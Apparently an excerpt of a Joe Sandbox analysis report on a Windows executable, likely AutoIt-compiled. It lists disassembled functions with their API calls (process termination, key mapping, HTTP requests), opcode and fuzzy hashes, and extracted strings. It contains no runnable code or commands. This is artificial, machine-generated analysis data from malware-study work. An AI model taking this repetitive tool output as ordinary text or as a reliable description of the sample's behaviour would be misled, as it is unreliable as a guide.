                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3311875123-0
                                                                                                                                                        • Opcode ID: 243fcc52a47b87361f8d2b089d6521862a0e2472be8d62e65736c6a1144fc87c
                                                                                                                                                        • Instruction ID: 34fff60ed098ef29b97f98b334402f817218801ace02236730f5ca077c657990
                                                                                                                                                        • Opcode Fuzzy Hash: 243fcc52a47b87361f8d2b089d6521862a0e2472be8d62e65736c6a1144fc87c
                                                                                                                                                        • Instruction Fuzzy Hash: 3A51BA70A00A09ABDF21CF78D988BAEBBF6AF15318F58421AE4069B390D770D944CB51
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                        • BeginPaint.USER32(?,?,?,?,?,?), ref: 00AAB1C1
                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00AAB225
                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00AAB242
                                                                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00AAB253
                                                                                                                                                        • EndPaint.USER32(?,?), ref: 00AAB29D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1827037458-0
                                                                                                                                                        • Opcode ID: 47932d0de124856b0a153a2000bd8c323e1a49badf01240718ac7da73bd23dcd
                                                                                                                                                        • Instruction ID: 2059bf27615d5950d27d4954b7579ecdb8465cb2db13ecb92d48faf32597968d
                                                                                                                                                        • Opcode Fuzzy Hash: 47932d0de124856b0a153a2000bd8c323e1a49badf01240718ac7da73bd23dcd
                                                                                                                                                        • Instruction Fuzzy Hash: BD418F711043019FD721DF28DC84BBA7BE8EB56724F1406A9F995872E2CB3198459B61
                                                                                                                                                        APIs
                                                                                                                                                        • ShowWindow.USER32(00B51810,00000000,?,?,00B51810,00B51810,?,00B0E2D6), ref: 00AFE21B
                                                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 00AFE23F
                                                                                                                                                        • ShowWindow.USER32(00B51810,00000000,?,?,00B51810,00B51810,?,00B0E2D6), ref: 00AFE29F
                                                                                                                                                        • ShowWindow.USER32(?,00000004,?,?,00B51810,00B51810,?,00B0E2D6), ref: 00AFE2B1
                                                                                                                                                        • EnableWindow.USER32(?,00000001), ref: 00AFE2D5
                                                                                                                                                        • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00AFE2F8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 642888154-0
                                                                                                                                                        • Opcode ID: a5f2bf12394d9911878a0ed4c3a9ad7c0bfd0bbfa25b26d53461e24a7064f185
                                                                                                                                                        • Instruction ID: 942685d9362ddae41c3b45d59edce3e8d8b46c977b2e159c3ca6d0b2e66e182d
                                                                                                                                                        • Opcode Fuzzy Hash: a5f2bf12394d9911878a0ed4c3a9ad7c0bfd0bbfa25b26d53461e24a7064f185
                                                                                                                                                        • Instruction Fuzzy Hash: E6411A34601249EFDF26CF94C499BE47BE5BB0A314F1881A9FA588F2B2D731A845CB51
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                                                                                                                                                          • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                                                                                                                                                          • Part of subcall function 00A93BCF: _wcscpy.LIBCMT ref: 00A93BF2
                                                                                                                                                        • _wcstok.LIBCMT ref: 00AE1D6E
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00AE1DFD
                                                                                                                                                        • _memset.LIBCMT ref: 00AE1E30
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                                        • String ID: X
                                                                                                                                                        • API String ID: 774024439-3081909835
                                                                                                                                                        • Opcode ID: 3df0a132e1c4a1ba5d35507ee14690841e00b921b0c2fcab53144c15c8c8cf6e
                                                                                                                                                        • Instruction ID: 665e7c51e9a6bf088e72296f0e6fa1c0062bf61cdd462433b8948d69f1a4ee37
                                                                                                                                                        • Opcode Fuzzy Hash: 3df0a132e1c4a1ba5d35507ee14690841e00b921b0c2fcab53144c15c8c8cf6e
                                                                                                                                                        • Instruction Fuzzy Hash: A2C161316087509FCB14EF24C991A9EB7E4FF85310F00496DF89A9B2A2DB30ED45CB92
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00AAB5EB
                                                                                                                                                          • Part of subcall function 00AAB58B: SelectObject.GDI32(?,00000000), ref: 00AAB5FA
                                                                                                                                                          • Part of subcall function 00AAB58B: BeginPath.GDI32(?), ref: 00AAB611
                                                                                                                                                          • Part of subcall function 00AAB58B: SelectObject.GDI32(?,00000000), ref: 00AAB63B
                                                                                                                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00AFE9F2
                                                                                                                                                        • LineTo.GDI32(00000000,00000003,?), ref: 00AFEA06
                                                                                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00AFEA14
                                                                                                                                                        • LineTo.GDI32(00000000,00000000,?), ref: 00AFEA24
                                                                                                                                                        • EndPath.GDI32(00000000), ref: 00AFEA34
                                                                                                                                                        • StrokePath.GDI32(00000000), ref: 00AFEA44
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 43455801-0
                                                                                                                                                        • Opcode ID: 7d312d591b36fbdb020f7cf4e5eacb18cb9b0db0d7fc59c1b08f512887d73eb8
                                                                                                                                                        • Instruction ID: 44cfa833079546820c2d977700fb0bb3b35ebfefc11ff42f2c5cb2c914537ec9
                                                                                                                                                        • Opcode Fuzzy Hash: 7d312d591b36fbdb020f7cf4e5eacb18cb9b0db0d7fc59c1b08f512887d73eb8
                                                                                                                                                        • Instruction Fuzzy Hash: E811F77600014DBFDB129F94DC88EEA7FADEB08355F048422FA099A1A0DB719D559BA0
                                                                                                                                                        APIs
                                                                                                                                                        • GetDC.USER32(00000000), ref: 00ACEFB6
                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00ACEFC7
                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00ACEFCE
                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00ACEFD6
                                                                                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00ACEFED
                                                                                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 00ACEFFF
                                                                                                                                                          • Part of subcall function 00ACA83B: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00ACA79D,00000000,00000000,?,00ACAB73), ref: 00ACB2CA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 603618608-0
                                                                                                                                                        • Opcode ID: 0f708652a470db4dbba71f0b5c6fa8ae6618a9b40c7465e30b7de7cbd4cea2a6
                                                                                                                                                        • Instruction ID: ead854f8f1b5797a5af9bfacff70bf58e2d6cf521f8d046a53a899a83ca94403
                                                                                                                                                        • Opcode Fuzzy Hash: 0f708652a470db4dbba71f0b5c6fa8ae6618a9b40c7465e30b7de7cbd4cea2a6
                                                                                                                                                        • Instruction Fuzzy Hash: 21016C75A00315BFEB109BA59C45F5EBFB8EB48751F108069FD04E7290DA709D11CF61
                                                                                                                                                        APIs
                                                                                                                                                        • __init_pointers.LIBCMT ref: 00AB87D7
                                                                                                                                                          • Part of subcall function 00AB1E5A: __initp_misc_winsig.LIBCMT ref: 00AB1E7E
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00AB8BE1
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00AB8BF5
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00AB8C08
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00AB8C1B
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00AB8C2E
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00AB8C41
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00AB8C54
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00AB8C67
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00AB8C7A
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00AB8C8D
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00AB8CA0
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00AB8CB3
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00AB8CC6
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00AB8CD9
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00AB8CEC
                                                                                                                                                          • Part of subcall function 00AB1E5A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00AB8CFF
                                                                                                                                                        • __mtinitlocks.LIBCMT ref: 00AB87DC
                                                                                                                                                          • Part of subcall function 00AB8AB3: InitializeCriticalSectionAndSpinCount.KERNEL32(00B4AC68,00000FA0,?,?,00AB87E1,00AB6AFA,00B467D8,00000014), ref: 00AB8AD1
                                                                                                                                                        • __mtterm.LIBCMT ref: 00AB87E5
                                                                                                                                                          • Part of subcall function 00AB884D: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00AB89CF
                                                                                                                                                          • Part of subcall function 00AB884D: _free.LIBCMT ref: 00AB89D6
                                                                                                                                                          • Part of subcall function 00AB884D: RtlDeleteCriticalSection.NTDLL(00B4AC68), ref: 00AB89F8
                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00AB880A
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00AB8833
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2942034483-0
                                                                                                                                                        • Opcode ID: 7ccde39a94c6069050334b595f8b1049fcd6b73b1aeb9a5e318896b8be4e4d7c
                                                                                                                                                        • Instruction ID: ad7e55b539d33b5085afbfa151fee82edddc35be92537350a12d31cfdc9929aa
                                                                                                                                                        • Opcode Fuzzy Hash: 7ccde39a94c6069050334b595f8b1049fcd6b73b1aeb9a5e318896b8be4e4d7c
                                                                                                                                                        • Instruction Fuzzy Hash: 13F0903211A7515AF2247B7C7E17ACA26CC9F02BB4B650A2AF464D60D3FF188881C160
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1423608774-0
                                                                                                                                                        APIs
                                                                                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A91898
                                                                                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00A918A0
                                                                                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A918AB
                                                                                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A918B6
                                                                                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00A918BE
                                                                                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A918C6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Virtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4278518827-0
                                                                                                                                                        APIs
                                                                                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00AD8504
                                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00AD851A
                                                                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00AD8529
                                                                                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AD8538
                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AD8542
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AD8549
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 839392675-0
                                                                                                                                                        APIs
                                                                                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00ADA330
                                                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00ADA341
                                                                                                                                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,00B066D3,?,?,?,?,?,00A9E681), ref: 00ADA34E
                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00B066D3,?,?,?,?,?,00A9E681), ref: 00ADA35B
                                                                                                                                                          • Part of subcall function 00AD9CCE: CloseHandle.KERNEL32(?,?,00ADA368,?,?,?,00B066D3,?,?,?,?,?,00A9E681), ref: 00AD9CD8
                                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00ADA36E
                                                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00ADA375
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3495660284-0
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AB010A: std::exception::exception.LIBCMT ref: 00AB013E
                                                                                                                                                          • Part of subcall function 00AB010A: __CxxThrowException@8.LIBCMT ref: 00AB0153
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                          • Part of subcall function 00A9BBD9: _memmove.LIBCMT ref: 00A9BC33
                                                                                                                                                        • __swprintf.LIBCMT ref: 00AAD98F
                                                                                                                                                        Strings
                                                                                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00AAD832
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                        • API String ID: 1943609520-557222456
                                                                                                                                                        APIs
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00AEB4A8
                                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00AEB5B7
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00AEB73A
                                                                                                                                                          • Part of subcall function 00ADA6F6: VariantInit.OLEAUT32(00000000), ref: 00ADA736
                                                                                                                                                          • Part of subcall function 00ADA6F6: VariantCopy.OLEAUT32(?,?), ref: 00ADA73F
                                                                                                                                                          • Part of subcall function 00ADA6F6: VariantClear.OLEAUT32(?), ref: 00ADA74B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                        • API String ID: 4237274167-1221869570
                                                                                                                                                        • Opcode ID: ca63d2aa9198d965a27aea94db3783ab2f1a872a6544f158e225e59fa2dc700c
                                                                                                                                                        • Instruction ID: 01d642c60d04bc8f23130544b043df2f44320c9be68883859c12443caf58888a
                                                                                                                                                        • Opcode Fuzzy Hash: ca63d2aa9198d965a27aea94db3783ab2f1a872a6544f158e225e59fa2dc700c
                                                                                                                                                        • Instruction Fuzzy Hash: 3B918A706183419FCB10DF29C58595BB7F4AF89710F04886DF88A8B3A2DB31E945CB62
                                                                                                                                                        APIs
                                                                                                                                                        • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00AD10B8
                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00AD10EE
                                                                                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00AD10FF
                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00AD1181
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                        • String ID: DllGetClassObject
                                                                                                                                                        • API String ID: 753597075-1075368562
                                                                                                                                                        • Opcode ID: 300187ea8d87f28cde8bacd2011eaff286d3150d48fe91b27b1d0862e6435cb9
                                                                                                                                                        • Instruction ID: 1dc8b2e770486a49c87a56d97e7b801039850a5a134065e91977356197d1478f
                                                                                                                                                        • Opcode Fuzzy Hash: 300187ea8d87f28cde8bacd2011eaff286d3150d48fe91b27b1d0862e6435cb9
                                                                                                                                                        • Instruction Fuzzy Hash: 534129B1600205FFDB15CF55C884B9ABBB9EF44754B1481AEFA0A9F305D7B1DA44CBA0
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AD5A93
                                                                                                                                                        • GetMenuItemInfoW.USER32 ref: 00AD5AAF
                                                                                                                                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00AD5AF5
                                                                                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B518F0,00000000), ref: 00AD5B3E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                        • String ID: 0
                                                                                                                                                        • API String ID: 1173514356-4108050209
                                                                                                                                                        • Opcode ID: 8b026900d22fefee691593e8017e4b55e1338e06a5983aa76b64f8795ed6a198
                                                                                                                                                        • Instruction ID: c03a201978f72c51f23077ea994570e87e37ddb3829a566c077f7c4ee70909e5
                                                                                                                                                        • Opcode Fuzzy Hash: 8b026900d22fefee691593e8017e4b55e1338e06a5983aa76b64f8795ed6a198
                                                                                                                                                        • Instruction Fuzzy Hash: C6416E716047019FDB149F24C884B5ABBE5EF89714F14461FF9A69B3D1E770A800CB62
                                                                                                                                                        APIs
                                                                                                                                                        • CharLowerBuffW.USER32(?,?,?,?), ref: 00AF0478
                                                                                                                                                          • Part of subcall function 00A97F40: _memmove.LIBCMT ref: 00A97F8F
                                                                                                                                                          • Part of subcall function 00A9A2FB: _memmove.LIBCMT ref: 00A9A33D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove$BuffCharLower
                                                                                                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                        • API String ID: 2411302734-567219261
                                                                                                                                                        • Opcode ID: feedd6f63746c3381cf36b0360ffacd1f84942d6257be3c08aab1e7040854a7c
                                                                                                                                                        • Instruction ID: 37635e7b08491df0cf361b6c9e090c471f822f8d97b0163e39a168cc06dd7f9d
                                                                                                                                                        • Opcode Fuzzy Hash: feedd6f63746c3381cf36b0360ffacd1f84942d6257be3c08aab1e7040854a7c
                                                                                                                                                        • Instruction Fuzzy Hash: 49316D75600619AFCF04DF98C941ABEB3F5FF15350B108A29E562972D2DB71EA05CF80
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00ACC684
                                                                                                                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00ACC697
                                                                                                                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00ACC6C7
                                                                                                                                                          • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$_memmove
                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                        • API String ID: 458670788-1403004172
                                                                                                                                                        • Opcode ID: 68f03525d5c7d6b91baedc031a58698a00cd39d5f11bf5bc7c869f285c41bc98
                                                                                                                                                        • Instruction ID: e32ac47711f5e2a4d8dd932ab2a8af1d0c5c68141d5583733a1ed7f737b44d1e
                                                                                                                                                        • Opcode Fuzzy Hash: 68f03525d5c7d6b91baedc031a58698a00cd39d5f11bf5bc7c869f285c41bc98
                                                                                                                                                        • Instruction Fuzzy Hash: DB21F171A00108BEDB04EB64C986EFFBBB9DF06360B11961DF42AE71E1DB745D0A9720
                                                                                                                                                        APIs
                                                                                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00AE4A60
                                                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AE4A86
                                                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00AE4AB6
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00AE4AFD
                                                                                                                                                          • Part of subcall function 00AE56A9: GetLastError.KERNEL32(?,?,00AE4A2B,00000000,00000000,00000001), ref: 00AE56BE
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1951874230-3916222277
                                                                                                                                                        • Opcode ID: 06fe1797266badeb48c0bdaacd7ce875d81a2ad382972aa98a895e9463ced450
                                                                                                                                                        • Instruction ID: 882c28041cd61df97041c4b88e8b60fdd9112091e24eb083bb37d8ddb57ed62f
                                                                                                                                                        • Opcode Fuzzy Hash: 06fe1797266badeb48c0bdaacd7ce875d81a2ad382972aa98a895e9463ced450
                                                                                                                                                        • Instruction Fuzzy Hash: 5F21CFB5540208BFEB11DF669C84EBBB6FCEB8C798F10402AF50597140EA649D059771
                                                                                                                                                        APIs
                                                                                                                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B0454E
                                                                                                                                                          • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                                                                                                                                                        • _memset.LIBCMT ref: 00A93965
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00A939B5
                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A939C6
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                                                        • String ID: Line:
                                                                                                                                                        • API String ID: 3942752672-1585850449
                                                                                                                                                        • Opcode ID: 0e8b7e01307bc7853f0e0f77b8cf23e099ba49874d83c0c9acd80c9978112ccb
